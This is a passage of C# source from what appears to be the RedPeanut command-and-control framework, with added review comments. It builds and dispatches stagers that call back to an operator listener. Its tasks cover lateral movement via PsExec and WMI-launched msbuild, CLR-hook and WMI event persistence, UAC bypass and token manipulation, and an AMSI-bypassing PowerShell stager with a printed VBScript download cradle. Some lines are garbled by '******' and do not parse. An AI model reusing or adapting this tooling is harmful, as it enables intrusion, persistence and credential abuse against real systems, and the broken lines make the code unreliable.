            string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40)));
            // Create the TaskMsg (gzip).
            if (agent != null)
            {
                ModuleConfig modconfig = new ModuleConfig
                {
                    Assembly = stagerstr,
                    Method = "Execute",
                    Moduleclass = "RedPeanutRP",
                    Parameters = new string[] { "pippo" }
                };
                TaskMsg task = new TaskMsg
                {
                    TaskType = "module",
                    ModuleTask = modconfig,
                    Agentid = agent.AgentId
                };
                if (agent.Pivoter != null)
                {
                    task.AgentPivot = agent.Pivoter.AgentId;
                }
                // Create the service stream (gzip).
                source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
                    .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR))
                    .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                    .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);
                // Fourth positional argument "exe" selects the output type.
                string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));
                // Create the SharpPsExec stream (gzip); unset display/description/
                // service names fall back to random strings.
                source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
                    .Replace("#DOMAIN#", domain)
                    .Replace("#USERNAME#", username)
                    .Replace("#PASSWORD#", password)
                    .Replace("#HOSTANME#", targethost)
                    .Replace("#ASSEMBLY#", servicestr)
                    .Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
                    .Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
                    .Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
                    .Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));
                string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
                RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
            }
        }
    }
}
// Task body: builds a stager for the current agent's listener (HTTP, or a
// named pipe named after the agent id when the agent has a Pivoter), then
// compiles CLRHOOKINSTALL_TEMPLATE with the gzip/base64 contents of the
// workspace key file (key.snk), the stager, a random hook file name, the
// target `process` name and the CLR version; the result is run on the agent
// as "PersCLRInstall" with "cleanenv" when `uninstall` is set, "install"
// otherwise.
// Does nothing when `process` is empty or the resolved profile id is
// unknown; any exception is reported with a fixed message and swallowed.
// `clrversion` values other than 35 and 40 are coerced to 40.
private void Run()
{
    try
    {
        string host = ((AgentInstanceHttp)agent).GetAddress();
        int port = ((AgentInstanceHttp)agent).GetPort();
        int profileid = ((AgentInstanceHttp)agent).GetProfileid();
        int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
        string pipename = "";
        if (!string.IsNullOrEmpty(process))
        {
            if (agent.Pivoter != null)
            {
                // Pivoted agent: callback goes to the pivot's IP over a named
                // pipe using the default profile.
                host = agent.Pivoter.SysInfo.Ip;
                port = 0;
                profileid = RedPeanutC2.server.GetDefaultProfile();
                targetframework = agent.TargetFramework;
                pipename = agent.AgentId;
            }
            else
            {
                // Re-assigns the values already read above (redundant, kept as is),
                // except targetframework which now comes from the base agent.
                host = ((AgentInstanceHttp)agent).GetAddress();
                port = ((AgentInstanceHttp)agent).GetPort();
                profileid = ((AgentInstanceHttp)agent).GetProfileid();
                targetframework = agent.TargetFramework;
            }
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
            {
                string source;
                if (string.IsNullOrEmpty(pipename))
                {
                    // HTTP stager, no pivot.
                    ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                    source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                }
                else
                {
                    // Named-pipe (pivot) stager.
                    ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                    source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
                }
                string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
                string hookfilename = RandomAString(10, new Random()) + ".dll";
                // The key file is read from disk on every run; a missing file
                // surfaces as the generic catch below.
                string keyfilename = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, KEYFILE_FOLDER, "key.snk");
                if (clrversion != 35 && clrversion != 40)
                {
                    clrversion = 40;
                }
                source = File.ReadAllText(Path.Combine(folderrpath, CLRHOOKINSTALL_TEMPLATE))
                    .Replace("#KEYFILE#", Convert.ToBase64String(CompressGZipAssembly(File.ReadAllBytes(keyfilename))))
                    .Replace("#STAGER#", stagerstr)
                    .Replace("#FILENAME#", hookfilename)
                    .Replace("#PROCESS#", process)
                    .Replace("#CLRVERSION#", clrversion.ToString());
                string clrhookinstaller = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
                if (uninstall)
                {
                    RunAssemblyBase64(clrhookinstaller, "PersCLRInstall", new string[] { "cleanenv" }, agent);
                }
                else
                {
                    RunAssemblyBase64(clrhookinstaller, "PersCLRInstall", new string[] { "install" }, agent);
                }
            }
        }
    }
    catch (Exception)
    {
        // "Errore" is the original (Italian) message text; it is a runtime string and left unchanged.
        Console.WriteLine("[*] Errore generating task");
    }
}
// Task body: builds a stager from STAGER_TEMPLATE (HTTP when lpipename is
// null, named-pipe pivot otherwise), wraps it as shellcode inside
// SPAWNER_TEMPLATE together with the credentials, and packages that spawner
// into an MSBuild project via MSBuildGenerator. The project file is gzipped
// and copied to \\targethost\C$\Windows\temp\<random>.xml through a
// FILEUPLOAD_TEMPLATE assembly run on the agent, after which SharpWMI is
// tasked to launch msbuild.exe on the target with that file.
// Returns silently when username, password, lhost or profile is unset, when
// both lpipename and lport are unset, or when the profile id is unknown;
// other errors are printed and swallowed. `domain` falls back to "." for the
// upload step but is substituted unchanged into the spawner template.
// NOTE(review): the assembled SharpWMI argument string, including the
// password, is echoed to the console ("String command: ...") — that line
// leaks the credential into any console capture or log.
private void Run()
{
    try
    {
        if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(lhost) || (string.IsNullOrEmpty(lpipename) && lport < 1) || profile < 1)
        {
            return;
        }
        else
        {
            // Parse the .cs template source and replace the placeholders.
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
            {
                string domainname = ".";
                if (!string.IsNullOrEmpty(domain))
                {
                    domainname = domain;
                }
                string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                // Note the asymmetry with the guard above: an empty (non-null)
                // lpipename still takes the named-pipe branch here.
                if (lpipename == null)
                {
                    // HTTP stager, no pivot.
                    ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                }
                else
                {
                    // Named-pipe (pivot) stager.
                    ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                    source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                }
                string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
                // Create the TaskMsg (gzip).
                if (agent != null)
                {
                    // NOTE(review): `RandomString` here vs `RandomAString` elsewhere — confirm it is a distinct helper.
                    source = File.ReadAllText(Path.Combine(folderrpath, SPAWNER_TEMPLATE))
                        .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
                        .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn)
                        .Replace("#USERNAME#", username)
                        .Replace("#PASSWORD#", password)
                        .Replace("#DOMAIN#", domain);
                    string spawner = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
                    Dictionary<string, string> msbuildargs = new Dictionary<string, string>();
                    msbuildargs.Add("#{taskname}", taskname);
                    MSBuildGenerator gen = new MSBuildGenerator(spawner, msbuildargs);
                    string pathdest = string.Format(@"\\{0}\C$\Windows\temp", targethost);
                    string filename = RandomAString(10, new Random()).ToLower() + ".xml";
                    string filesrc = Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(gen.GetScriptText())));
                    // Computed but never used.
                    string destinattionfull = pathdest.TrimEnd('\\') + @"\" + filename;
                    // pathdest is never empty here, so destinationpath is always the escaped UNC path.
                    string destinationpath = ".";
                    if (!string.IsNullOrEmpty(pathdest))
                    {
                        destinationpath = pathdest.Replace("\\", "\\\\");
                    }
                    string destinationfilename = "";
                    if (!string.IsNullOrEmpty(filename))
                    {
                        destinationfilename = filename;
                    }
                    // Parse the upload template and replace the placeholders.
                    source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE));
                    source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname);
                    string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40)));
                    // Task the agent to copy the file to the target host.
                    RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent);
                    // Run msbuild via WMI.
                    // NOTE(review): the next two statements contain "******" in this
                    // copy of the source and do not parse as C#; they look redacted.
                    // Check the original before relying on this block.
                    List<string> args = new List<string>();
                    args.Add("action=create");
                    args.Add("computername=" + targethost);
                    args.Add("username="******"\\" + username);
                    args.Add("password="******"command=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\temp\\" + destinationfilename);
                    // Concatenates every argument (password included) and prints it.
                    string s = "";
                    foreach (string ss in args.ToArray())
                    {
                        s += ss;
                    }
                    Console.WriteLine("String command: " + s);
                    RunAssembly(PL_MODULE_SHARPWMI, "SharpWMI.Program", args.ToArray(), agent);
                }
            }
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
    }
}
// Task body: compiles a stager DLL from STAGER_TEMPLATE (target framework 40),
// gzips it, embeds it under "#{assembly}" in INSTALLUTIL_TEMPLATE and builds
// that as an executable named `filename`. If the build landed in
// WORKSPACE_FOLDER/ASSEMBLY_OIUTPUT_FOLDER it is either registered as a web
// resource (`hosted`) or copied to the system temp directory; otherwise an
// error is printed.
// Returns silently when filename, lhost, lport or profile is unset or the
// profile id is unknown; other errors are printed and swallowed.
// `args` is allocated but never used.
private void Run()
{
    List<string> args = new List<string>();
    try
    {
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
        {
            return;
        }
        else
        {
            // Parse the .cs template source and replace the placeholders.
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
            {
                ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                // The inner stager is built under "tmp_" + filename; the outer
                // executable takes `filename` itself.
                string assemblyBase64 = Builder.GenerateDllBase64(source, "tmp_" + filename);
                byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
                string agentCompBase64 = Convert.ToBase64String(CompressGZipAssembly(assemblybytte));
                string sourceinstallutil = File.ReadAllText(Path.Combine(folderrpath, INSTALLUTIL_TEMPLATE))
                    .Replace("#{assembly}", agentCompBase64);
                Builder.GenerateExe(sourceinstallutil, filename);
                // GenerateExe reports nothing; existence of the output file is the success check.
                if (File.Exists(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename)))
                {
                    if (hosted)
                    {
                        // Add the resource to the web server storage.
                        C2Manager c2manager = Program.GetC2Manager();
                        c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(null, filename));
                        Console.WriteLine("[*] Resource added to webserver resources");
                        return;
                    }
                    else
                    {
                        // Copy the built file to the temp directory.
                        File.WriteAllBytes(Path.Combine(Path.GetTempPath(), filename), File.ReadAllBytes(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename)));
                        Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                    }
                }
                else
                {
                    // Runtime string kept as is (typo in the original message).
                    Console.WriteLine("[x] Error creating IndtallUtil dll");
                }
            }
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}
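/// <summary>
/// Fills the agent/stager template placeholders from the listener config and
/// its HTTP profile, and renders the profile's GET client headers as
/// <c>webHeaderCollection.Add(...)</c> statements for <c>#HEADERS#</c>.
/// </summary>
/// <param name="src">Template source text.</param>
/// <param name="serverkey">Value for <c>#SERVERKEY#</c>. The original ignored this
/// parameter and re-read <c>RedPeanut.Program.GetServerKey()</c>; it is now honoured,
/// with the old lookup kept as the fallback for a null argument. Every visible
/// caller passes that same value, so the output is unchanged for them.</param>
/// <param name="targetframework">Value for <c>#FRAMEWORK#</c>.</param>
/// <param name="config">Listener config supplying host, port and profile.</param>
/// <returns>The template with all placeholders replaced; <c>#PIPENAME#</c> is always emptied.</returns>
/// <remarks>
/// The "Connection" header is skipped. Every other header name (dashes
/// removed) must parse as a <c>HttpRequestHeader</c> member; one that does not
/// is reported and skipped rather than aborting the whole replacement.
/// The unused <c>int t</c> of the original is gone; the parse is kept purely
/// as that validation.
/// </remarks>
public static string ReplaceAgentProfile(string src, string serverkey, int targetframework, ListenerConfig config)
{
    var profile = config.GetProfile();
    string key = serverkey ?? RedPeanut.Program.GetServerKey();

    string source = src
        .Replace("#HOST#", config.GetHost())
        .Replace("#PORT#", config.GetPort().ToString())
        .Replace("#PARAM#", profile.HttpPost.Param)
        .Replace("#SERVERKEY#", key)
        .Replace("#PAGEGET#", ParseUri(profile.HttpGet.ApiPath))
        .Replace("#PAGEPOST#", ParseUri(profile.HttpPost.ApiPath))
        .Replace("#USERAGENT#", profile.UserAgent)
        .Replace("#PIPENAME#", "")
        .Replace("#COVERED#", profile.HtmlCovered.ToString().ToLower())
        .Replace("#TARGETCLASS#", profile.TargetClass)
        .Replace("#SPAWN#", profile.Spawn)
        .Replace("#FRAMEWORK#", targetframework.ToString())
        .Replace("#MANAGED#", profile.InjectionManaged.ToString());

    string headers = "";
    foreach (HttpHeader h in profile.HttpGet.Client.Headers)
    {
        try
        {
            if (h.Name.Equals("Connection", StringComparison.Ordinal))
            {
                continue;
            }

            string enumName = h.Name.Replace("-", "");
            // Validation only: throws for names that are not HttpRequestHeader members.
            Enum.Parse(typeof(HttpRequestHeader), enumName, true);
            headers += string.Format("webHeaderCollection.Add(HttpRequestHeader.{0}, \"{1}\");" + Environment.NewLine, enumName, h.Value);
        }
        catch (Exception)
        {
            Console.WriteLine("[x] Error parsing header {0}", h.Name);
        }
    }

    return source.Replace("#HEADERS#", headers);
}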
// Task entry point: builds a stager from the agent's connection parameters, embeds it in the
// UACTOKEN_TEMPLATE source and dispatches the resulting assembly to the agent via RunAssemblyBase64.
// All errors are swallowed and reported with a single fixed console line (the exception itself is
// discarded, so a template or compile failure gives no diagnostic).
private void Run()
{
    try
    {
        // These four initial values are always overwritten by one of the branches below
        // (both the pivot and the non-pivot path assign every one of them).
        string host = ((AgentInstanceHttp)agent).GetAddress();
        int port = ((AgentInstanceHttp)agent).GetPort();
        int profileid = ((AgentInstanceHttp)agent).GetProfileid();
        int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
        string pipename = "";
        if (agent.Pivoter != null)
        {
            // Pivoted agent: address comes from the pivot's system info, the default profile is
            // used and the pipe name is the agent id. pipename != "" selects the pivot branch below.
            host = agent.Pivoter.SysInfo.Ip;
            port = 0;
            profileid = RedPeanutC2.server.GetDefaultProfile();
            targetframework = agent.TargetFramework;
            pipename = agent.AgentId;
        }
        else
        {
            host = ((AgentInstanceHttp)agent).GetAddress();
            port = ((AgentInstanceHttp)agent).GetPort();
            profileid = ((AgentInstanceHttp)agent).GetProfileid();
            targetframework = agent.TargetFramework;
        }
        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
        // Unknown profile id: the task is silently skipped.
        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
        {
            string source;
            if (string.IsNullOrEmpty(pipename))
            {
                // HTTP (no pivot) stager.
                ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
            }
            else
            {
                // Named-pipe (pivot) stager; uses the ListenerPivotConfig overload of the replacer.
                ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
            }
            // Assembly names are random per call; `new Random()` is a non-cryptographic PRNG seeded
            // from the clock, fine for a file name, not for anything that needs to be unguessable.
            string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
            // Second stage: fill the UACTOKEN_TEMPLATE placeholders. `binary`, `arguments` and `path`
            // are task fields set outside this method.
            source = File.ReadAllText(Path.Combine(folderrpath, UACTOKEN_TEMPLATE))
                .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(
                    Builder.GenerateShellcode(stagerstr, RandomAString(10, new Random()) + ".exe", "RedPeanutRP", "Execute", new string[] { "pippo" })
                )))
                .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                .Replace("#BINARY#", binary)
                .Replace("#ARGUMENTS#", arguments)
                .Replace("#PATH#", path);
            string uacbypass = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
            // Hand the built assembly to the agent; the single-space argument array is what the
            // callee expects for "no arguments" (same convention as the other tasks in this file).
            RunAssemblyBase64(
                uacbypass,
                "TokenManipulation",
                new string[] { " " },
                agent);
        }
    }
    catch (Exception)
    {
        // Exception detail is dropped here, unlike the sibling Run() methods which print e.Message.
        Console.WriteLine("[*] Errore generating task");
    }
}
// Task entry point: builds the PowerShell stager pair (gen_s1 and its "s2_" second stage) for
// this task's filename/lhost/lport/profile and either registers both as hosted web resources
// or writes both to the local temp directory.
//
// Preconditions: filename, lhost, lport and profile must all be set; otherwise the method
// returns silently. Failures inside the try are reported as a single console line with
// e.Message only. The build/register/write skeleton is duplicated in the other Run() methods
// of this file.
private void Run()
{
    // `args` is never read in this method.
    List<string> args = new List<string>();
    try
    {
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
        {
            return;
        }
        else
        {
            // Parse the .cs template source and replace the placeholder variables.
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            // Unknown profile id: nothing is built and nothing is reported.
            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
            {
                ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                // `40` is the target-framework selector understood by the replacer/builder.
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                string assemblyBase64 = Builder.GenerateDllBase64(source, filename);
                // Placeholders consumed by the PowerShell generators.
                Dictionary<string, string> arg = new Dictionary<string, string>();
                arg.Add("#{lhost}", lhost);
                arg.Add("#{lport}", lport.ToString());
                // Normalise the profile's content URI to "segment/" form so it can be prefixed to names.
                string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;
                uricontent = uricontent.TrimStart('/');
                if (!uricontent.EndsWith("/"))
                {
                    uricontent += "/";
                }
                arg.Add("#{uri}", uricontent + "s2_" + filename);
                byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
                // Note: CompressAssembly here, whereas the InstallUtil task uses CompressGZipAssembly.
                string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
                Dictionary<string, string> argagent = new Dictionary<string, string>();
                // The second stage needs the uncompressed assembly length.
                argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
                PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
                if (hosted)
                {
                    // Add both stages to webserver storage under filename and "s2_" + filename.
                    C2Manager c2manager = Program.GetC2Manager();
                    c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen_s1, filename));
                    c2manager.GetC2Server().RegisterWebResource("s2_" + filename, new WebResourceInstance(gen_s2, "s2_" + filename));
                    Console.WriteLine("[*] Resource added to webserver resources");
                    // NOTE(review): the scheme is hard-coded to https regardless of the listener's
                    // SSL setting (the persistence task in this file derives it from `ssl` instead).
                    Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                    Console.WriteLine("[*]");
                    // gen_s0 is only used for this printed example; it is never registered or written.
                    Console.WriteLine("[*] Cradle example");
                    Console.WriteLine("[*]");
                    Console.WriteLine("<script language = \"VBScript\">");
                    Console.WriteLine(" Function etaget()");
                    Console.WriteLine("");
                    Console.WriteLine(" Dim ahsten");
                    Console.WriteLine(" Set ahsten = CreateObject(\"Wscript.Shell\")");
                    Console.WriteLine(" ahsten.run \"powershell.exe -nop -w 1 -enc {0}\", 0, true", gen_s0.GetScriptText());
                    Console.WriteLine(" End Function");
                    Console.WriteLine("");
                    Console.WriteLine(" etaget");
                    Console.WriteLine(" self.close");
                    Console.WriteLine("</script>");
                    Console.WriteLine("[*]");
                    return;
                }
                else
                {
                    // Not hosted: write both stages into the operator's temp directory.
                    File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen_s1.GetScriptText());
                    File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + filename), gen_s2.GetScriptText());
                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + filename));
                }
            }
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[*] Error running task build {0}", e.Message);
        return;
    }
}
// Task entry point: registers a randomly named PowerShell stager pair as hosted web resources,
// builds the URL the agent will be pointed at, fills the PERSWMI_TEMPLATE with that URL plus the
// task's eventname/processname/encoded fields, and dispatches the compiled assembly to the agent.
//
// Preconditions: processname and eventname must both be set; otherwise nothing happens and
// nothing is printed. Unlike the other tasks there is no `hosted` switch – the resources are
// always registered on the web server. Errors are reported with e.Message only.
private void Run()
{
    try
    {
        // `args` is never read in this method.
        List<string> args = new List<string>();
        if (!string.IsNullOrEmpty(processname) && !string.IsNullOrEmpty(eventname))
        {
            // Create and register the web resources.
            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
            // Random, lower-cased resource name; `new Random()` is clock-seeded, not cryptographic.
            string filename = RandomAString(10, new Random()).ToLower();
            // Listener parameters are taken from the agent this task targets (HTTP agent assumed;
            // the casts throw InvalidCastException for other agent types and land in the catch).
            ListenerConfig conf = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()), ((AgentInstanceHttp)agent).GetProfileid());
            string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
            // `40` is the target-framework selector; unlike the other tasks the profile id is not
            // checked with ContainsKey first, so an unknown id surfaces as an exception instead.
            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
            string assemblyBase64 = Builder.GenerateDllBase64(source, filename + ".dll");
            byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
            string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
            Dictionary<string, string> argagent = new Dictionary<string, string>();
            // The second stage needs the uncompressed assembly length.
            argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
            // Normalise the profile's content URI to "segment/" form.
            string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()).ContentUri;
            uricontent = uricontent.TrimStart('/');
            if (!uricontent.EndsWith("/"))
            {
                uricontent += "/";
            }
            Dictionary<string, string> arg = new Dictionary<string, string>
            {
                { "#{lhost}", ((AgentInstanceHttp)agent).GetAddress() },
                { "#{lport}", ((AgentInstanceHttp)agent).GetPort().ToString() },
                { "#{uri}", uricontent + "s2_" + filename + ".ps1" }
            };
            PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
            PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
            // Add both stages to webserver storage; they remain registered after the task finishes.
            C2Manager c2manager = Program.GetC2Manager();
            c2manager.GetC2Server().RegisterWebResource(filename + ".ps1", new WebResourceInstance(gen_s1, filename + ".ps1"));
            c2manager.GetC2Server().RegisterWebResource("s2_" + filename + ".ps1", new WebResourceInstance(gen_s2, "s2_" + filename + ".ps1"));
            Console.WriteLine("[*] Resource added to webserver resources");
            // Scheme follows the listener's `ssl` flag (the other tasks hard-code https in their output).
            string proto = "";
            if (ssl)
            {
                proto = "https";
            }
            else
            {
                proto = "http";
            }
            string url = string.Format("{0}://{1}:{2}/{3}{4}", proto, ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), uricontent, filename + ".ps1");
            // Fill the persistence template; ReplacePersWMI is defined elsewhere.
            string perssrc = File.ReadAllText(Path.Combine(folderrpath, PERSWMI_TEMPLATE));
            perssrc = Replacer.ReplacePersWMI(perssrc, eventname, url, processname, encoded);
            // Compile under the Persistence profile and hand the assembly to the agent.
            RunAssemblyBase64(
                Convert.ToBase64String(
                    CompressGZipAssembly(
                        Builder.BuidStreamAssembly(perssrc, RandomAString(10, new Random()).ToLower() + ".dll", 40, compprofile: CompilationProfile.Persistence)
                    )
                ),
                "PersWMI",
                new string[] { " " },
                agent);
            return;
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[x] Error generating task {0}", e.Message);
    }
}
/// <summary>
/// Creates a listener instance bound to <paramref name="lconfig"/> and records
/// <paramref name="server"/> in the class-wide <c>server</c> field.
/// </summary>
/// <param name="server">Owning C2 server; stored statically, so the most recently
/// constructed instance overwrites what earlier instances stored.</param>
/// <param name="lconfig">Listener configuration; its SSL flag is cached in <c>ssl</c>.</param>
public RedPeanutC2(C2Server server, ListenerConfig lconfig)
{
    Lconfig = lconfig;
    ssl = lconfig.GetSsl();
    RedPeanutC2.server = server;
}
// Task entry point: builds an HTA-wrapped stager in one of two flavours selected by `lang`
// ("vbs" or "powershell") and either registers the result as hosted web resources or writes
// the files to the local temp directory. Any other `lang` value prints a message and returns.
//
// Preconditions: filename, lhost, lport and profile must all be set; otherwise the method
// returns silently. In both flavours an unknown profile id also returns silently. Failures
// inside the try are reported with e.Message only. The two branches duplicate the
// guard/build/register/write flow seen in the other Run() methods of this file.
private void Run()
{
    // `args` is never read in this method.
    List<string> args = new List<string>();
    try
    {
        if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
        {
            return;
        }
        else
        {
            // Ordinal, case-sensitive match: "VBS" or "PowerShell" fall through to "not supported".
            if (lang == "vbs")
            {
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                {
                    // Build the agent DLL with the `35` framework selector (this branch only).
                    ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
